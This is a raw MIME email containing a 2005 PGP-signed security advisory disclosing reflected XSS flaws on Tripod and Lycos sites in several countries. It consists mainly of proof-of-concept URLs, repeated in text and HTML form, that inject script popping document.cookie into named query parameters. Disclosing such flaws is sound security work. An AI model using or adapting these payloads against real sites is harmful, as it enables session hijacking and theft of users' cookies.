This is a multi-part message in MIME format. ------=_NextPart_000_0005_01C53480.E4D6FC80 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory http://icis.digitalparadox.org/~dcrab http://www.hackerscenter.com/ Severity: Medium Title: Multiple xss vulnerabilities in Tripod.com Date: March 30, 2005 Site: http://www.tripod.com Summary: There are multiple XSS vulnerabilities in the Tripod.com Proof of Concept Exploit: http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=3D&qu=3D&query=3D= %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Pops cookie http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=3D&qu=3D%22%3E%= 3Cscript%3Ealert(document.cookie)%3C/script%3E&query=3D1 Pops cookie http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&qu=3D&query=3D1 Pops cookie http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D%22%3E%3Cscript%3Eal= ert(document.cookie)%3C/script%3E&mrc=3D&qu=3D&query=3D1 Pops cookie http://shopping.lycos.co.uk/query.html?cat=3D%22%3E%3Cscript%3Ealert(docu= ment.cookie)%3C/script%3E&brd=3D&mrc=3D&qu=3D&query=3D1 Pops cookie http://webhosting.lycos.co.uk/business/compare/?compareId=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E Pops cookie http://webhosting.lycos.co.uk/consumer/compare/?compareId=3D"><script>ale= rt(document.cookie)</script> Pops cookie http://www.multimania.lycos.fr/search/?query=3Dphp&collection=3D"><script= >alert(document.cookie)</script>&action=3D1 Pops cookie http://www.tripod.jubii.dk/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1 Pops cookie http://www.tripod.lycos.co.uk/search/?query=3Dphp&collection=3D%22%3E%3Cs= cript%3Ealert(document.cookie)%3C/script%3E&action=3D1 Pops cookie http://www.tripod.lycos.de/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1 Pops cookie http://www.tripod.lycos.es/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1 Pops cookie http://www.tripod.lycos.it/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1 Pops cookie http://www.tripod.lycos.nl/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1 Pops cookie http://www.tripod.spray.se/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1 Pops cookie Author: These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. = Lookout for my soon to come out book on Secure coding with php. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQkk8ISZV5e8av/DUEQLZzwCg/tGlfLNPtQCbYge2oDUyRJK6RR8AoN2C 9FDhk4OgSnAljDh8yIdaJ1cj =3DqJY/ -----END PGP SIGNATURE----- ------=_NextPart_000_0005_01C53480.E4D6FC80 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Diso-8859-1"> <META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED = MESSAGE-----<BR>Hash:=20 SHA1</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20 href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox= .org/~dcrab</A><BR><A=20 href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><= /FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>Severity: Medium<BR>Title: = Multiple xss=20 vulnerabilities in Tripod.com<BR>Date: March 30, = 2005<BR>Site: <A=20 href=3D"http://www.tripod.com">http://www.tripod.com</A></FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>Summary:<BR>There are multiple XSS = vulnerabilities=20 in the Tripod.com</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>Proof of Concept Exploit:</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2><A=20 href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc= =3D&qu=3D&query=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/scr= ipt%3E">http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc= =3D&qu=3D&query=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/scr= ipt%3E</A><BR>Pops=20 cookie</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV><FONT face=3DArial = size=3D2> <DIV><BR><A=20 href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc= =3D&qu=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&qu= ery=3D1">http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mr= c=3D&qu=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&q= uery=3D1</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc= =3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&qu=3D&qu= ery=3D1">http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mr= c=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&qu=3D&q= uery=3D1</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D%22%3E%3= Cscript%3Ealert(document.cookie)%3C/script%3E&mrc=3D&qu=3D&qu= ery=3D1">http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D%22%3E%= 3Cscript%3Ealert(document.cookie)%3C/script%3E&mrc=3D&qu=3D&q= uery=3D1</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://shopping.lycos.co.uk/query.html?cat=3D%22%3E%3Cscript%3Eal= ert(document.cookie)%3C/script%3E&brd=3D&mrc=3D&qu=3D&que= ry=3D1">http://shopping.lycos.co.uk/query.html?cat=3D%22%3E%3Cscript%3Eal= ert(document.cookie)%3C/script%3E&brd=3D&mrc=3D&qu=3D&que= ry=3D1</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://webhosting.lycos.co.uk/business/compare/?compareId=3D%22%3= E%3Cscript%3Ealert(document.cookie)%3C/script%3E">http://webhosting.lycos= .co.uk/business/compare/?compareId=3D%22%3E%3Cscript%3Ealert(document.coo= kie)%3C/script%3E</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D'http://webhosting.lycos.co.uk/consumer/compare/?compareId=3D"><sc= ript>alert(document.cookie)</script'>http://webhosting.lycos.co.uk/consum= er/compare/?compareId=3D"><script>alert(document.cookie)</scr= ipt</A>><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D'http://www.multimania.lycos.fr/search/?query=3Dphp&collection= =3D"><script>alert(document.cookie)</script>&action=3D1'>http://www.m= ultimania.lycos.fr/search/?query=3Dphp&collection=3D"><script&g= t;alert(document.cookie)</script>&action=3D1</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://www.tripod.jubii.dk/search/?query=3Dphp&collection=3D%= 22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http= ://www.tripod.jubii.dk/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://www.tripod.lycos.co.uk/search/?query=3Dphp&collection=3D= %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">htt= p://www.tripod.lycos.co.uk/search/?query=3Dphp&collection=3D%22%3E%3C= script%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://www.tripod.lycos.de/search/?query=3Dphp&collection=3D%= 22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http= ://www.tripod.lycos.de/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://www.tripod.lycos.es/search/?query=3Dphp&collection=3D%= 22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http= ://www.tripod.lycos.es/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://www.tripod.lycos.it/search/?query=3Dphp&collection=3D%= 22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http= ://www.tripod.lycos.it/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://www.tripod.lycos.nl/search/?query=3Dphp&collection=3D%= 22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http= ://www.tripod.lycos.nl/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR><A=20 href=3D"http://www.tripod.spray.se/search/?query=3Dphp&collection=3D%= 22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http= ://www.tripod.spray.se/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20 cookie</DIV> <DIV> </DIV> <DIV><BR>Author:<BR>These vulnerabilties have been found and released by = Diabolic Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, = please feel=20 free to contact me regarding these vulnerabilities. You can find me at, = <A=20 href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> = or <A=20 href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox= .org/~dcrab</A>.=20 Lookout for my soon to come out book on Secure coding with php.</DIV> <DIV> </DIV> <DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed = for=20 commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV> <DIV> </DIV> <DIV>iQA/AwUBQkk8ISZV5e8av/DUEQLZzwCg/tGlfLNPtQCbYge2oDUyRJK6RR8AoN2C<BR>= 9FDhk4OgSnAljDh8yIdaJ1cj<BR>=3DqJY/<BR>-----END=20 PGP SIGNATURE-----<BR></FONT></DIV></BODY></HTML> ------=_NextPart_000_0005_01C53480.E4D6FC80--